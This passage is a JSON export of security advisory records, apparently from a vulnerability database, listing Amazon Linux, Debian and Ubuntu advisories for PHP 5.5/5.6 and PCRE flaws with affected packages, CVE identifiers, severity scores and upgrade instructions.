php55-snmp-5.5.26-1.103.amzn1.x86_64 \n php55-ldap-5.5.26-1.103.amzn1.x86_64 \n php55-devel-5.5.26-1.103.amzn1.x86_64 \n php55-mysqlnd-5.5.26-1.103.amzn1.x86_64 \n php55-common-5.5.26-1.103.amzn1.x86_64 \n php55-xml-5.5.26-1.103.amzn1.x86_64 \n php55-recode-5.5.26-1.103.amzn1.x86_64 \n php55-debuginfo-5.5.26-1.103.amzn1.x86_64 \n php55-fpm-5.5.26-1.103.amzn1.x86_64 \n php55-bcmath-5.5.26-1.103.amzn1.x86_64 \n php55-xmlrpc-5.5.26-1.103.amzn1.x86_64 \n php55-opcache-5.5.26-1.103.amzn1.x86_64 \n php55-enchant-5.5.26-1.103.amzn1.x86_64 \n php55-pgsql-5.5.26-1.103.amzn1.x86_64 \n php55-pdo-5.5.26-1.103.amzn1.x86_64 \n php55-intl-5.5.26-1.103.amzn1.x86_64 \n php55-dba-5.5.26-1.103.amzn1.x86_64 \n php55-soap-5.5.26-1.103.amzn1.x86_64 \n \n \n", "edition": 1, "reporter": "Amazon", "published": "2015-07-07T22:40:00", "title": "Medium: php55", "type": "amazon", "enchantments": {"score": {"modified": "2018-10-02T16:55:12", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-3415", "CVE-2015-2325", "CVE-2015-4644", "CVE-2014-3416", "CVE-2015-4642", "CVE-2015-3416", "CVE-2015-3414", "CVE-2015-4643", "CVE-2015-2326"], "modified": "2015-07-07T22:40:00", "id": "ALAS-2015-562", "href": "https://alas.aws.amazon.com/ALAS-2015-562.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-02T16:55:07", "references": [], "affectedPackage": [{"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "x86_64", "packageFilename": "php56-enchant-5.6.10-1.115.amzn1.x86_64.rpm", "packageName": "php56-enchant", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "x86_64", "packageFilename": "php56-mssql-5.6.10-1.115.amzn1.x86_64.rpm", "packageName": "php56-mssql", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "i686", "packageFilename": "php56-imap-5.6.10-1.115.amzn1.i686.rpm", "packageName": "php56-imap", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "x86_64", "packageFilename": "php56-snmp-5.6.10-1.115.amzn1.x86_64.rpm", "packageName": "php56-snmp", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "x86_64", "packageFilename": "php56-ldap-5.6.10-1.115.amzn1.x86_64.rpm", "packageName": "php56-ldap", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "x86_64", "packageFilename": "php56-recode-5.6.10-1.115.amzn1.x86_64.rpm", "packageName": "php56-recode", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "i686", "packageFilename": "php56-pdo-5.6.10-1.115.amzn1.i686.rpm", "packageName": "php56-pdo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "x86_64", "packageFilename": "php56-opcache-5.6.10-1.115.amzn1.x86_64.rpm", "packageName": "php56-opcache", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "i686", "packageFilename": "php56-tidy-5.6.10-1.115.amzn1.i686.rpm", "packageName": "php56-tidy", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "x86_64", "packageFilename": "php56-mysqlnd-5.6.10-1.115.amzn1.x86_64.rpm", "packageName": "php56-mysqlnd", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "x86_64", "packageFilename": "php56-gmp-5.6.10-1.115.amzn1.x86_64.rpm", "packageName": "php56-gmp", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "x86_64", "packageFilename": "php56-pspell-5.6.10-1.115.amzn1.x86_64.rpm", "packageName": "php56-pspell", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "i686", "packageFilename": "php56-enchant-5.6.10-1.115.amzn1.i686.rpm", "packageName": "php56-enchant", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "i686", "packageFilename": "php56-xml-5.6.10-1.115.amzn1.i686.rpm", "packageName": "php56-xml", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "x86_64", "packageFilename": "php56-embedded-5.6.10-1.115.amzn1.x86_64.rpm", "packageName": "php56-embedded", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "x86_64", "packageFilename": "php56-odbc-5.6.10-1.115.amzn1.x86_64.rpm", "packageName": "php56-odbc", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "x86_64", "packageFilename": "php56-soap-5.6.10-1.115.amzn1.x86_64.rpm", "packageName": "php56-soap", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "x86_64", "packageFilename": "php56-gd-5.6.10-1.115.amzn1.x86_64.rpm", "packageName": "php56-gd", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "i686", "packageFilename": "php56-fpm-5.6.10-1.115.amzn1.i686.rpm", "packageName": "php56-fpm", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "i686", "packageFilename": "php56-soap-5.6.10-1.115.amzn1.i686.rpm", "packageName": "php56-soap", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "i686", "packageFilename": "php56-common-5.6.10-1.115.amzn1.i686.rpm", "packageName": "php56-common", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "i686", "packageFilename": "php56-cli-5.6.10-1.115.amzn1.i686.rpm", "packageName": "php56-cli", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "i686", "packageFilename": "php56-xmlrpc-5.6.10-1.115.amzn1.i686.rpm", "packageName": "php56-xmlrpc", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "i686", "packageFilename": "php56-debuginfo-5.6.10-1.115.amzn1.i686.rpm", "packageName": "php56-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "i686", "packageFilename": "php56-mssql-5.6.10-1.115.amzn1.i686.rpm", "packageName": "php56-mssql", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "i686", "packageFilename": "php56-mysqlnd-5.6.10-1.115.amzn1.i686.rpm", "packageName": "php56-mysqlnd", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "i686", "packageFilename": "php56-dba-5.6.10-1.115.amzn1.i686.rpm", "packageName": "php56-dba", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "i686", "packageFilename": "php56-dbg-5.6.10-1.115.amzn1.i686.rpm", "packageName": "php56-dbg", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "i686", "packageFilename": "php56-bcmath-5.6.10-1.115.amzn1.i686.rpm", "packageName": "php56-bcmath", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "i686", "packageFilename": "php56-mcrypt-5.6.10-1.115.amzn1.i686.rpm", "packageName": "php56-mcrypt", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "x86_64", "packageFilename": "php56-intl-5.6.10-1.115.amzn1.x86_64.rpm", "packageName": "php56-intl", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "x86_64", "packageFilename": "php56-mbstring-5.6.10-1.115.amzn1.x86_64.rpm", "packageName": "php56-mbstring", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "x86_64", "packageFilename": "php56-xml-5.6.10-1.115.amzn1.x86_64.rpm", "packageName": "php56-xml", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "i686", "packageFilename": "php56-devel-5.6.10-1.115.amzn1.i686.rpm", "packageName": "php56-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "x86_64", "packageFilename": "php56-process-5.6.10-1.115.amzn1.x86_64.rpm", "packageName": "php56-process", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "i686", "packageFilename": "php56-intl-5.6.10-1.115.amzn1.i686.rpm", "packageName": "php56-intl", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "x86_64", "packageFilename": "php56-common-5.6.10-1.115.amzn1.x86_64.rpm", "packageName": "php56-common", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "i686", "packageFilename": "php56-pgsql-5.6.10-1.115.amzn1.i686.rpm", "packageName": "php56-pgsql", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "x86_64", "packageFilename": "php56-tidy-5.6.10-1.115.amzn1.x86_64.rpm", "packageName": "php56-tidy", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "x86_64", "packageFilename": "php56-cli-5.6.10-1.115.amzn1.x86_64.rpm", "packageName": "php56-cli", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "x86_64", "packageFilename": "php56-xmlrpc-5.6.10-1.115.amzn1.x86_64.rpm", "packageName": "php56-xmlrpc", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "x86_64", "packageFilename": "php56-fpm-5.6.10-1.115.amzn1.x86_64.rpm", "packageName": "php56-fpm", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "i686", "packageFilename": "php56-opcache-5.6.10-1.115.amzn1.i686.rpm", "packageName": "php56-opcache", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "x86_64", "packageFilename": "php56-pdo-5.6.10-1.115.amzn1.x86_64.rpm", "packageName": "php56-pdo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "i686", "packageFilename": "php56-gd-5.6.10-1.115.amzn1.i686.rpm", "packageName": "php56-gd", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "i686", "packageFilename": "php56-odbc-5.6.10-1.115.amzn1.i686.rpm", "packageName": "php56-odbc", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "x86_64", "packageFilename": "php56-imap-5.6.10-1.115.amzn1.x86_64.rpm", "packageName": "php56-imap", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "x86_64", "packageFilename": "php56-bcmath-5.6.10-1.115.amzn1.x86_64.rpm", "packageName": "php56-bcmath", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "x86_64", "packageFilename": "php56-dbg-5.6.10-1.115.amzn1.x86_64.rpm", "packageName": "php56-dbg", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "i686", "packageFilename": "php56-gmp-5.6.10-1.115.amzn1.i686.rpm", "packageName": "php56-gmp", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "i686", "packageFilename": "php56-recode-5.6.10-1.115.amzn1.i686.rpm", "packageName": "php56-recode", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "x86_64", "packageFilename": "php56-pgsql-5.6.10-1.115.amzn1.x86_64.rpm", "packageName": "php56-pgsql", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "x86_64", "packageFilename": "php56-5.6.10-1.115.amzn1.x86_64.rpm", "packageName": "php56", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "i686", "packageFilename": "php56-5.6.10-1.115.amzn1.i686.rpm", "packageName": "php56", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "src", "packageFilename": "php56-5.6.10-1.115.amzn1.src.rpm", "packageName": "php56", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "x86_64", "packageFilename": "php56-debuginfo-5.6.10-1.115.amzn1.x86_64.rpm", "packageName": "php56-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "i686", "packageFilename": "php56-snmp-5.6.10-1.115.amzn1.i686.rpm", "packageName": "php56-snmp", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "x86_64", "packageFilename": "php56-devel-5.6.10-1.115.amzn1.x86_64.rpm", "packageName": "php56-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "i686", "packageFilename": "php56-mbstring-5.6.10-1.115.amzn1.i686.rpm", "packageName": "php56-mbstring", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "i686", "packageFilename": "php56-pspell-5.6.10-1.115.amzn1.i686.rpm", "packageName": "php56-pspell", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "x86_64", "packageFilename": "php56-mcrypt-5.6.10-1.115.amzn1.x86_64.rpm", "packageName": "php56-mcrypt", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "i686", "packageFilename": "php56-embedded-5.6.10-1.115.amzn1.i686.rpm", "packageName": "php56-embedded", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "x86_64", "packageFilename": "php56-dba-5.6.10-1.115.amzn1.x86_64.rpm", "packageName": "php56-dba", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "i686", "packageFilename": "php56-ldap-5.6.10-1.115.amzn1.i686.rpm", "packageName": "php56-ldap", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.10-1.115.amzn1", "arch": "i686", "packageFilename": "php56-process-5.6.10-1.115.amzn1.i686.rpm", "packageName": "php56-process", "operator": "lt"}], "description": "**Issue Overview:**\n\nUpstream reports that several bugs have been fixed as well as several security issues into some bundled libraries ([CVE-2015-3414 __](<https://access.redhat.com/security/cve/CVE-2015-3414>), [CVE-2015-3415 __](<https://access.redhat.com/security/cve/CVE-2015-3415>), [CVE-2015-3416 __](<https://access.redhat.com/security/cve/CVE-2015-3416>), [CVE-2015-2325 __](<https://access.redhat.com/security/cve/CVE-2015-2325>) and [CVE-2015-2326 __](<https://access.redhat.com/security/cve/CVE-2015-2326>)). All PHP 5.6 users are encouraged to upgrade to this version. Please see the [upstream release notes](<http://php.net/ChangeLog-5.php#5.6.10>) for full details.\n\n \n**Affected Packages:** \n\n\nphp56\n\n \n**Issue Correction:** \nRun _yum update php56_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n php56-intl-5.6.10-1.115.amzn1.i686 \n php56-enchant-5.6.10-1.115.amzn1.i686 \n php56-snmp-5.6.10-1.115.amzn1.i686 \n php56-fpm-5.6.10-1.115.amzn1.i686 \n php56-pgsql-5.6.10-1.115.amzn1.i686 \n php56-mssql-5.6.10-1.115.amzn1.i686 \n php56-dba-5.6.10-1.115.amzn1.i686 \n php56-odbc-5.6.10-1.115.amzn1.i686 \n php56-mysqlnd-5.6.10-1.115.amzn1.i686 \n php56-mbstring-5.6.10-1.115.amzn1.i686 \n php56-5.6.10-1.115.amzn1.i686 \n php56-tidy-5.6.10-1.115.amzn1.i686 \n php56-pdo-5.6.10-1.115.amzn1.i686 \n php56-gd-5.6.10-1.115.amzn1.i686 \n php56-pspell-5.6.10-1.115.amzn1.i686 \n php56-recode-5.6.10-1.115.amzn1.i686 \n php56-opcache-5.6.10-1.115.amzn1.i686 \n php56-embedded-5.6.10-1.115.amzn1.i686 \n php56-dbg-5.6.10-1.115.amzn1.i686 \n php56-gmp-5.6.10-1.115.amzn1.i686 \n php56-debuginfo-5.6.10-1.115.amzn1.i686 \n php56-common-5.6.10-1.115.amzn1.i686 \n php56-ldap-5.6.10-1.115.amzn1.i686 \n php56-bcmath-5.6.10-1.115.amzn1.i686 \n php56-soap-5.6.10-1.115.amzn1.i686 \n php56-devel-5.6.10-1.115.amzn1.i686 \n php56-mcrypt-5.6.10-1.115.amzn1.i686 \n php56-imap-5.6.10-1.115.amzn1.i686 \n php56-xml-5.6.10-1.115.amzn1.i686 \n php56-cli-5.6.10-1.115.amzn1.i686 \n php56-process-5.6.10-1.115.amzn1.i686 \n php56-xmlrpc-5.6.10-1.115.amzn1.i686 \n \n src: \n php56-5.6.10-1.115.amzn1.src \n \n x86_64: \n php56-common-5.6.10-1.115.amzn1.x86_64 \n php56-dba-5.6.10-1.115.amzn1.x86_64 \n php56-mbstring-5.6.10-1.115.amzn1.x86_64 \n php56-enchant-5.6.10-1.115.amzn1.x86_64 \n php56-debuginfo-5.6.10-1.115.amzn1.x86_64 \n php56-devel-5.6.10-1.115.amzn1.x86_64 \n php56-process-5.6.10-1.115.amzn1.x86_64 \n php56-odbc-5.6.10-1.115.amzn1.x86_64 \n php56-xml-5.6.10-1.115.amzn1.x86_64 \n php56-bcmath-5.6.10-1.115.amzn1.x86_64 \n php56-imap-5.6.10-1.115.amzn1.x86_64 \n php56-embedded-5.6.10-1.115.amzn1.x86_64 \n php56-dbg-5.6.10-1.115.amzn1.x86_64 \n php56-pgsql-5.6.10-1.115.amzn1.x86_64 \n php56-ldap-5.6.10-1.115.amzn1.x86_64 \n php56-xmlrpc-5.6.10-1.115.amzn1.x86_64 \n php56-mysqlnd-5.6.10-1.115.amzn1.x86_64 \n php56-recode-5.6.10-1.115.amzn1.x86_64 \n php56-gmp-5.6.10-1.115.amzn1.x86_64 \n php56-intl-5.6.10-1.115.amzn1.x86_64 \n php56-mcrypt-5.6.10-1.115.amzn1.x86_64 \n php56-mssql-5.6.10-1.115.amzn1.x86_64 \n php56-snmp-5.6.10-1.115.amzn1.x86_64 \n php56-pspell-5.6.10-1.115.amzn1.x86_64 \n php56-cli-5.6.10-1.115.amzn1.x86_64 \n php56-fpm-5.6.10-1.115.amzn1.x86_64 \n php56-gd-5.6.10-1.115.amzn1.x86_64 \n php56-pdo-5.6.10-1.115.amzn1.x86_64 \n php56-tidy-5.6.10-1.115.amzn1.x86_64 \n php56-5.6.10-1.115.amzn1.x86_64 \n php56-opcache-5.6.10-1.115.amzn1.x86_64 \n php56-soap-5.6.10-1.115.amzn1.x86_64 \n \n \n", "edition": 1, "reporter": "Amazon", "published": "2015-07-07T22:39:00", "title": "Medium: php56", "type": "amazon", "enchantments": {"score": {"modified": "2018-10-02T16:55:07", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-3415", "CVE-2015-2325", "CVE-2015-4644", "CVE-2014-3416", "CVE-2015-4642", "CVE-2015-3416", "CVE-2015-3414", "CVE-2015-4643", "CVE-2015-2326"], "modified": "2015-07-07T22:39:00", "id": "ALAS-2015-563", "href": "https://alas.aws.amazon.com/ALAS-2015-563.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:00", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32204", "https://vulners.com/securityvulns/securityvulns:doc:32196"], "description": "NULL character injection, DoS, integer overflow, memory corruption.", "edition": 1, "reporter": "BUGTRAQ", "published": "2015-06-13T00:00:00", "title": "PHP multiple security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:00", "vector": "NONE", "value": 10.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "PHP", "version": "5.6", "operator": "eq"}], "cvelist": ["CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022"], "modified": "2015-06-13T00:00:00", "id": "SECURITYVULNS:VULN:14528", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14528", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:59", "references": [], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-3280-1 security@debian.org\r\nhttp://www.debian.org/security/ Moritz Muehlenhoff\r\nJune 07, 2015 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : php5\r\nCVE ID : CVE-2015-2783 CVE-2015-3329 CVE-2015-4021 CVE-2015-4022 \r\n CVE-2015-4024 CVE-2015-4025 CVE-2015-4026\r\n\r\nMultiple vulnerabilities have been discovered in PHP:\r\n\r\nCVE-2015-4025 / CVE-2015-4026\r\n\r\n Multiple function didn't check for NULL bytes in path names.\r\n\r\nCVE-2015-4024\r\n\r\n Denial of service when processing multipart/form-data requests.\r\n\r\nCVE-2015-4022\r\n\r\n Integer overflow in the ftp_genlist() function may result in\r\n denial of service or potentially the execution of arbitrary code.\r\n\r\nCVE-2015-4021 CVE-2015-3329 CVE-2015-2783\r\n\r\n Multiple vulnerabilities in the phar extension may result in\r\n denial of service or potentially the execution of arbitrary code\r\n when processing malformed archives.\r\n\r\nFor the oldstable distribution (wheezy), these problems have been fixed\r\nin version 5.4.41-0+deb7u1.\r\n\r\nFor the stable distribution (jessie), these problems have been fixed in\r\nversion 5.6.9+dfsg-0+deb8u1.\r\n\r\nFor the testing distribution (stretch), these problems have been fixed\r\nin version 5.6.9+dfsg-1.\r\n\r\nFor the unstable distribution (sid), these problems have been fixed in\r\nversion 5.6.9+dfsg-1.\r\n\r\nWe recommend that you upgrade your php5 packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: https://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1\r\n\r\niQIcBAEBAgAGBQJVdHnyAAoJEBDCk7bDfE42+jAP/0nZWh6HnJpBhxbSgP9fHmtJ\r\nNOp7GthaatDYuqZ2VOmQ16nh55p90fcbOkiUMtLvK6PF/D+JI0XpAnAKrHTWH491\r\n0Iz5Gh3sCKccQYweRAojgNOIm2zBKLFfzK778h6lQIcM3UY1w16RGWqSPEQ/L0pW\r\nCfxoGpom2SlhGE4wVxX1bmSGeM1k79hoZrzcBV7EfrqBU3zP/tSfRCTjjEIkYIov\r\nalmbQRAfdNnvOpJtBS+1NE/As4OX7JkJCCx45Bjfeond9oA22CsR62tan2+Y2wrk\r\nBd1UU8nNGnBfcv8ramWXzwZbUQDGfbsMJ4Dj/RpmID0e3HCAkRcSLEuSCWqCCE0o\r\nc6eL6gOWCp7l9uvsJZ3CG67zRkqdU1pj1dHy6p7j0E+o4iNSVwRYxqAO/luF/baB\r\nkOH5UV62On2UoSDGS4Ix+hHavC8dfX1L6NvH7YigXZYxNAsMLEo3x5M+tz5bJk7E\r\nI2RwRJ8rrDN8jC8f4sag+IThCezDHz3SPFE+IFyD3UredQwePfaY7IYn4Cl+nezY\r\n7yrcdyi1KJSQyDM9upE+L6Ytcv/5tZiOdOUxq31NKb7O3rLvTKZtreUAxvFiTepT\r\nMGPsLGF3LRsQoty3S8g1tkl2DHt6IZgIELT5x6xDCs7jBvC5R45UfhvFNm6fhM7F\r\nwjZ8f1+8OlapWivt9p0R\r\n=80kf\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2015-06-08T00:00:00", "title": "[SECURITY] [DSA 3280-1] php5 security update", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:59", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2015-2783", "CVE-2015-3329", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022"], "modified": "2015-06-08T00:00:00", "id": "SECURITYVULNS:DOC:32196", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32196", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:01", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32379"], "description": "Multiple memory corruptions on PCRE parsing.", "edition": 1, "reporter": "BUGTRAQ", "published": "2015-08-02T00:00:00", "title": "PCRE multiple security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:01", "vector": "NONE", "value": 9.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "pcre", "version": "8.35", "operator": "eq"}], "cvelist": ["CVE-2015-3210", "CVE-2015-2325", "CVE-2015-5073", "CVE-2015-2326"], "modified": "2015-08-02T00:00:00", "id": "SECURITYVULNS:VULN:14615", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14615", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:00", "references": [], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2694-1\r\nJuly 29, 2015\r\n\r\npcre3 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nPCRE could be made to crash or run programs if it processed a\r\nspecially-crafted regular expression.\r\n\r\nSoftware Description:\r\n- pcre3: Perl 5 Compatible Regular Expression Library\r\n\r\nDetails:\r\n\r\nMichele Spagnuolo discovered that PCRE incorrectly handled certain regular\r\nexpressions. A remote attacker could use this issue to cause applications\r\nusing PCRE to crash, resulting in a denial of service, or possibly execute\r\narbitrary code. This issue only affected Ubuntu 14.04 LTS. (CVE-2014-8964)\r\n\r\nKai Lu discovered that PCRE incorrectly handled certain regular\r\nexpressions. A remote attacker could use this issue to cause applications\r\nusing PCRE to crash, resulting in a denial of service, or possibly execute\r\narbitrary code. This issue only affected Ubuntu 14.04 LTS and Ubuntu 15.04.\r\n(CVE-2015-2325, CVE-2015-2326)\r\n\r\nWen Guanxing discovered that PCRE incorrectly handled certain regular\r\nexpressions. A remote attacker could use this issue to cause applications\r\nusing PCRE to crash, resulting in a denial of service, or possibly execute\r\narbitrary code. This issue only affected Ubuntu 15.04. (CVE-2015-3210)\r\n\r\nIt was discovered that PCRE incorrectly handled certain regular\r\nexpressions. A remote attacker could use this issue to cause applications\r\nusing PCRE to crash, resulting in a denial of service, or possibly execute\r\narbitrary code. This issue only affected Ubuntu 12.04 LTS and 14.04 LTS.\r\n(CVE-2015-5073)\r\n\r\nUpdate 